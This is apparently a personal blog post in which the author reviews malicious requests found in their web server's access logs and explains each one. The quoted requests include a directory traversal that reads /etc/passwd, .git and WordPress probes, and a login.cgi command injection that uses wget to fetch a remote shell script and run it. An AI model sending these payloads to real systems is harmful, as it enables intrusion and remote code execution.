Hackers Galore

7 January 2020

I recently rummaged through the access logs on my server since a university project I was working on did not seem to want to cooperate with me. I eventually found GoAccess, a very nice tool that makes it easy to look at all kinds of information that is buried in your server's access logs.

I could fix the problem I was having with my project but also found a set of very interesting requests that were sent to my server. I don't know if these are part of a coordinated attack against me or just requests from random bots that are trying to login to every server they can come across, which is probably more likely than the first option. Lets look into a few of these requests.

/index.php?page=../../../etc/passwd

This one is rather simple, it just tries to read my /etc/passwd file. If you're on Linux, you can try it out yourself by running cat ../../../etc/passwd, which should print some information about users on your system. This is called a directory traversal attack since the attacker tries to access directories he's not supposed to. This of course requires a website that has an index.php which shows pages dynamically. Unfortunately (for the attacker) my website is just boring HTML with nothing fancy going on, so such an attack is completely useless.

/.git/HEAD

This one is interesting. Assuming my website is under version control with git, you could read the entire history of changes including email adresses and the occasional leaked password. And yes, I use git to manage my website. But the content that is uploaded to the server is in a seperate directory that has no hidden information in it.

/wp-login.php
/server/wp-login.php
/wordpress/wp-login.php
/forum/wp-login.php
/blog/wp-login.php
/xmlrpc.php

Those are all valid locations for finding a login page for Wordpress. xmlrpc.php is especially interesting, as it allows rapid login attempts, ideal for a brute force password attack. But yet again my website is so boring that such an attack will not work.

/?author=1
/?author=2
/?author=3

My guess: Someone is trying to scrape emails from website and tries to view their profiles. This could work on a Wordpress page, I'm not sure.

/login.cgi?cli=aa aa';wget http://   .   .53.119/Venom.sh -O -> /tmp/kh;Venom.sh /tmp/kh'$

This looks like an attack that has more ground to stand on. It's probably generated with Venom, but since I have no experience with anything like this I could very well be wrong. Judging from the request it tries to download and execute a shell script from some server, for which I censored the IP. Once it has done that it can pretty much do anything. I don't think this particular attack would work on my server though, since login.cgi does not exist. It's probably from someone trying to log in to a bunch of websites.

My server received all other kinds of requests, but the examples I mentioned here cover most of them. Short conclusion: There are a lot of bad people on the internet so watch out!